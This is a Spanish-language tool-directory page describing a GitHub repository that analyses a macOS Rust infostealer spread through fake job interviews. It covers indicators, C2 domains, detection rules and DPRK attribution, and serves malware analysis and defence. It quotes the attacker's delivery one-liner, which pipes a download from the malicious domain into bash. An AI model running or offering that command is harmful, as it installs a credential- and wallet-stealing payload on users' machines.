Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
hyperhives-macos-infostealer-analysis — Análisis estático completo del infostealer de Rust para macOS de HyperHives — 571 valores de configuración descifrados, infraestructura C2, atribución a DPRK/Contagious Interview, reglas YARA/Sigma, paquete STIX 2.1, capa de ATT&CK Navigator | Kitploit
Herramientas/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Gestión de Indicadores de Compromiso (IOC)OSINT (Inteligencia de Fuentes Abiertas)Ingeniería InversaAnálisis ForenseAnálisis de MalwareInteligencia de AmenazasPapers e InvestigaciónAprendizaje y EducaciónRecursos Curados

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Análisis estático completo del infostealer de Rust para macOS de HyperHives — 571 valores de configuración descifrados, infraestructura C2, atribución a DPRK/Contagious Interview, reglas YARA/Sigma, paquete STIX 2.1, capa de ATT&CK Navigator

Ver RepositorioSitio web
31413hace 5 mesesRevisado por Kitploit
Compartir

HyperHives macOS Infostealer — Análisis Técnico Completo

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Inteligencia de amenazas: Infostealer universal binario de macOS basado en Rust entregado a través de un falso proceso de entrevista de trabajo en Wellfound (anteriormente AngelList). El operador con el alias "Felix" de "HyperHive" engañó a los objetivos para que ejecutaran un instalador malicioso desde macos.hyperhives.net. Este repositorio documenta el análisis estático completo: 571 valores de configuración cifrados recuperados, incluyendo URLs C2, un DSN de Sentry y 276 IDs de extensiones de Chrome objetivo.

SHA-256 de la muestra5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
Dominio C2cloudproxy.link
Dominio de entregamacos.hyperhives.net
Plataforma de señueloWellfound (anteriormente AngelList)
Persona del operador"Felix" en "HyperHive"
VirusTotal9 / 63 detecciones
ClasificaciónDivulgación pública / paquete de IOCs
Última actualizaciónAbril 2026

Contenidos

  • Paquetes de inteligencia de amenazas
  • Estructura del repositorio
  • Inicio rápido
  • Resumen
  • 1 — Cómo comenzó
  • 2 — El binario
  • 3 — Qué roba
  • 4 — Infraestructura C2 descifrada
  • 5 — Atribución
  • 6 — Criptoanálisis
  • 7 — Mapeo MITRE ATT&CK
  • 8 — Referencia de wallets e IDs de extensiones
  • 9 — Acciones recomendadas
  • 10 — Metodología
  • Apéndice A — Los 276 IDs de extensiones de Chrome
  • Alcance y limitaciones
  • Historial de versiones
  • Contribuciones
  • Licencia

Paquetes de inteligencia de amenazas

ArchivoFormatoPropósito
iocs.txtTexto planoHashes, dominios, URLs, IPs, correo electrónico, IDs de Sentry — pegar en listas de bloqueo, MISP, OpenCTI
yara_rules.yarYARA 4.2+Coincidencia de hash de muestra conocida + detecciones heurísticas de cadenas para Mach-O
sigma_rules.ymlSigmaReglas de proxy, DNS y creación de procesos — ajusta logsource para tu SIEM
stix/bundle.jsonSTIX 2.1Paquete CTI legible por máquina con indicadores, SDO de malware, infraestructura, patrones ATT&CK y relaciones
attack-navigator-layer.jsonATT&CK NavigatorImportar en ATT&CK Navigator para cobertura visual de técnicas

Estructura del repositorio```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---
## Inicio rápido

Coloca la muestra como `sample/installer_binary` (consulta [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) para verificar el hash), luego:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

El archivo compose impone network_mode: none, read_only: true, y elimina todas las capacidades de Linux. Consulte SECURITY.md para las pautas completas de manejo.


TL;DR

Una oferta de trabajo en Wellfound (anteriormente AngelList) llevó a una cadena de ingeniería social de múltiples correos electrónicos desde una persona operativa "Felix" en "HyperHive". Después de halagar los antecedentes técnicos del objetivo y programar una entrevista falsa, el atacante dirigió a la víctima a "revisar el producto" en hyperhives.net y examinar específicamente Configuración → Diagnóstico → Registro — un pretexto para desencadenar la ejecución de:``` curl -s https://macos.hyperhives.net/install | nohup bash &

La carga útil es un **binario universal Mach-O de 8.5 MB** (x86_64 + arm64) compilado en Rust. El análisis estático con un laboratorio Docker aislado y emulación de CPU de **570 rutinas auxiliares x86_64 únicas** recuperó **todos los 571 valores de configuración cifrados**, exponiendo:

- **C2:** `cloudproxy.link` — cuatro endpoints HTTPS
- **Sentry (pivote de atribución):** DSN completo con ID de org/proyecto en `ingest.de.sentry.io`
- **Identidad de compilación:** Usuario de Cargo `rootr`, nombre en clave `force`, versión `9.12.1`
- **Objetivos:** 276 ID de extensiones de Chrome (billeteras cripto, gestores de contraseñas, credenciales corporativas)

Las tácticas se alinean con las campañas **Contagious Interview vinculadas a RPDC** — reclutamiento falso en plataformas legítimas, construcción de confianza en múltiples pasos, entrega `curl | bash`, ladrón de macOS en Rust y exfiltración centrada en criptomonedas.

---

## 1 — Cómo empezó
Descargar herramienta